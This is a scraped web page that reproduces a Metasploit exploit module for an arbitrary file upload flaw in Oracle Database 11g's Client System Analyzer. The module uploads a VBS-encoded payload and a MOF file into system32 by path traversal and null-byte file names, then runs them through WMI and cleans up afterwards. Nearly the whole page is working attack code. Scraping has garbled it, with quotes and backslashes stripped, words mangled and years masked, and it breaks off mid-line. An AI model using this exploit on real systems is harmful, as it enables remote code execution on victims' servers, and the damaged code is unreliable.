Oracle数据库客户端系统分析仪任意文件上传 电脑资料

Oracle数据库客户端系统分析仪任意文件上传 电脑资料 # # This file is part of the Metasploit Framework and may be subject to # redistribution and mercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # metasploit./ # require msf/core class Metasploit3 /Oracle Containers for J2EE/ include Msf:Exploit:Remote:HttpClient include Msf:Exploit:EXE include Msf:Exploit:WbemExec def initialize(info = ) super(update_info(info, Name = Oracle Database Client System Analyzer Arbitrary File Upload, Description = %q This module exploits an arbitrary file upload vulnerability on the Client Analyzer ponent as included in Oracle Database 11g, which allows remote attackers to upload and execute arbitrary code. This module has been tested suessfully on Oracle Database 11g .0 on Windows xx SP2, where execution through the Windows Management Instrumentation service has been used. , Author = 1c239c43f521145fa8385d64a9c32243, # Vulnerability discovery juan vazquez # Metasploit module , License = MSF_LICENSE, Platform = win , Privileged = true, References = CVE, xx-3600 , OSVDB, 70546, BID, 45883, URL, .zerodayinitiative./advisories/ZDI-11-018/ , URL, .oracle./techwork/topics/security/cpujanxx-194091.html , Targets = Oracle Oracle11g .0 / Windows xx SP2, , DefaultTarget = 0, DisclosureDate = Jan 18 xx ) register_options( Opt:RPORT(1158), OptBool.new(SSL, true, Use SSL, true), OptInt.new(DEPTH, true, Traversal depth to reach the root, 13) , self.class ) end def on_new_session(client) return if not var_mof_name return if not var_vbs_name vbs_path = C:windowssystem32#var_vbs_name.vbs mof_path = C:windowssystem32wbemmofgood#var_mof_name.mof if client.type != meterpreter print_error(NOTE: you must use a meterpreter payload in order to automatically cleanup.) print_error(The vbs payload (#vbs_path) and mof file (#mof_path) must be removed manually.) return end # stdapi must be loaded before we can use fs.file client.core.use(stdapi) if not client.ext.aliases.include?(stdapi) attrib_path = C:windowssystem32attrib.exe -r cmd = attrib_path + mof_path cess.execute(cmd, nil, Hidden = true ) begin print_warning(Deleting the vbs payload #var_vbs_name.vbs .) client.fs.file.rm(vbs_path) print_warning(Deleting the mof file #var_mof_name.mof .) client.fs.file.rm(mof_path) rescue :Exception = e print_error(Exception: #e.inspect) end end def upload_file(data) res = send_request_cgi( uri = /em/ecm/csa/v10103/CSAr.jsp, method = POST, data = data ) return res end def check file_name = rand_text_alpha(rand(5)+5) file_contents = rand_text_alpha(rand(20)+20) data = sessionID=#file_name.txtx00.xml data x0dx0a data /em/CSA#file_name.txt) if res and res.code = 200 and res.body = /#file_contents/ return Exploit:CheckCode:Vulnerable end return Exploit:CheckCode:Appears end def exploit # In order to save binary data to the file system the payload is written to a .vbs # file and execute it from there. var_mof_name = rand_text_alpha(rand(5)+5) var_vbs_name = rand_text_alpha(rand(5)+5) print_status(Encoding payload into vbs.) # Only 100KB can be uploaded by default, because of this to_win32pe_old is used, # the new template is too big in this case. exe = Msf:Util:EXE.to_win32pe_old(framework, payload.encoded) # The payload is embedded in a vbs and executed from there to avoid badchars that # URLDecoder.decode (jsp) is unable to decode correctly such as 0x81, 0x8d, 0x8f, # 0x90 and 0x9d vbs = Msf:Util:EXE.to_exe_vbs(exe) print_status(Generating mof file.) mof_content = generate_mof(#var_mof_name.mof, #var_vbs_name.vbs) traversal = . * datastoreDEPTH data = sessionID=#traversalWINDOWSsystem32#var_vbs_name.vbsx00.xml data x0dx0a # The data to upload must be uri encoded because the vulnerable jsp will use # URLDecoder.decode on it before writting to file. data Rex:Text.uri_encode(vbs) print_status(Uploading the payload into the VBS to c:WINDOWSsystem32#var_vbs_name.vbs.) res = upload_file(data) if not res or res.code != 200 or (res.body ! /posted data was written to placeholder file/ and res.body ! /csaPostStatus=0/) fail_with(Exploit:Failure:Unknown, VBS upload failed) end data = sessionID=#traversalWINDOWSsystem32wbemmof#var_mof_name.mofx00.xml data x0dx0a data Rex:Text.uri_encode(mof_content) print_status(Uploading the mof file to c:WINDOWSsystem32wbemmof#var_mof_name